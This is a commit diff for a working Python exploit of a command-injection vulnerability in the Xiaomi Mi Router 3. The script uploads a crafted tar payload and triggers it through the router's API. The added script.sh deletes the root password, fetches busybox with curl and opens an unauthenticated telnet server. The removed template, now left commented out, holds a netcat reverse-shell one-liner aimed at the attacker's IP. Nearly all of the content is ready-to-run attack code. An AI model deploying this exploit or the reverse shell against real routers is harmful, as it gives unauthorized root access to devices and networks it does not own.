Improved shell: open telnet instead of a netcat shell

remote_command_execution_vulnerability.py

@@ -18,24 +18,16 @@
 import tarfile
 import requests
 
-netcat_port = "4444"
-print("Start netcat on port {}".format(netcat_port))
-print("(The way to do this in MacOS is to open a terminal and run '/usr/bin/nc -l {}')".format(netcat_port))
-input("When you are done, press any key to continue")
-
 router_ip_address = input("Router IP address: ")
-#router_ip_address = "192.168.0.21"
-
-attacker_ip_address = input("Your IP address: ")
-#attacker_ip_address = "192.168.0.25"
+# router_ip_address = "192.168.0.21"
 
-## get stok
+# get stok
 stok = input("stok: ")
-#stok = "8f84067eb7408c39f77969c50a73b2f2"
+# stok = "eeb59f33a51cd46649cd4ad1e3f50ecf"
 
 # From https://blog.securityevaluators.com/show-mi-the-vulns-exploiting-command-injection-in-mi-router-3-55c6bcb48f09
 # In the attacking machine (macos), run the following before executing this script: /usr/bin/nc -l 4444
-command="((sh /tmp/build/script.sh) &)"
+command="((sh /tmp/script.sh) &)"
 
 # proxies = {"http":"http://127.0.0.1:8080"}
 proxies = {}
@@ -53,31 +45,21 @@
 with open("build/speedtest_urls.xml",'wt') as f:
 	f.write(data)
 
-## make script file
-with open("script_template.sh","rt") as f:
-	script_template = f.read()
-script_data = script_template.format(attacker_ip_address=attacker_ip_address, directory="/tmp/p", port=netcat_port)
-# print(script_data)
-with open("build/script.sh",'wt') as f:
-	f.write(script_data)
-
 print("****************")
-print("netcat_port: " + netcat_port)
-print("attacker_ip_address: " + attacker_ip_address)
 print("router_ip_address: " + router_ip_address)
-print("stok:" + stok)
+print("stok: " + stok)
 print("****************")
 
 # Make tar
 with tarfile.open("build/payload.tar.gz", "w:gz") as tar:
 	tar.add("build/speedtest_urls.xml", "speedtest_urls.xml")
-	tar.add("build/script.sh")
-	# tar.add("extras/otapredownload")
+	tar.add("script.sh")
+	# tar.add("busybox")
 	# tar.add("extras/wget")
 	# tar.add("extras/xiaoqiang")
 
 ## upload config file
-print("start uploading config file ...")
+print("start uploading config file...")
 r1 = requests.post("http://{}/cgi-bin/luci/;stok={}/api/misystem/c_upload".format(router_ip_address, stok), files={"image":open("build/payload.tar.gz",'rb')}, proxies=proxies)
 # print(r1.text)
 
@@ -86,5 +68,6 @@
 r2 = requests.get("http://{}/cgi-bin/luci/;stok={}/api/xqnetdetect/netspeed".format(router_ip_address, stok), proxies=proxies)
 # print(r2.text)
 
-print("done!")
-
+print("done! Now you can connect to the router using telnet (user: root, password: none)")
+print("In MacOS, execute in the terminal:")
+print("telnet {}".format(router_ip_address))

script.sh

@@ -0,0 +1,16 @@
+########################################
+# Download standalone busybox and start telnet
+# busybox binary downloaded from https://www.busybox.net/downloads/binaries/1.31.0-defconfig-multiarch-musl/busybox-mipsel
+########################################
+passwd -d root # Remove root password, as the default one set by xiaomi is unknown
+
+# kill/stop telnet, in case it is running from a previous execution
+pgrep busybox | xargs kill
+
+cd /tmp
+rm -rf busybox
+curl "https://www.busybox.net/downloads/binaries/1.31.0-defconfig-multiarch-musl/busybox-mipsel" --output busybox
+chmod +x busybox
+./busybox telnetd
+
+echo "Script executed"

script_template.sh

@@ -1,11 +1,15 @@
 set -euo pipefail
 
-create_tunnel() {{
-  file=$1
-  port=$2
-  rm -rf $file; mkfifo $file;cat $file|/bin/sh -i 2>&1|nc {attacker_ip_address} $port >$file
-}}
+########################################
+# Create a netcat tunnel (this method is not used anymore in favour of telnet)
+########################################
+# create_tunnel() {{
+#   file=$1
+#   port=$2
+#   rm -rf $file; mkfifo $file;cat $file|/bin/sh -i 2>&1|nc {attacker_ip_address} $port >$file
+# }}
 
-create_tunnel "{directory}" "{port}"
+# create_tunnel "{directory}" "{port}"
 # Add more calls to create_tunnel here if you want to open multiple shells
-echo "Script executed"
+
+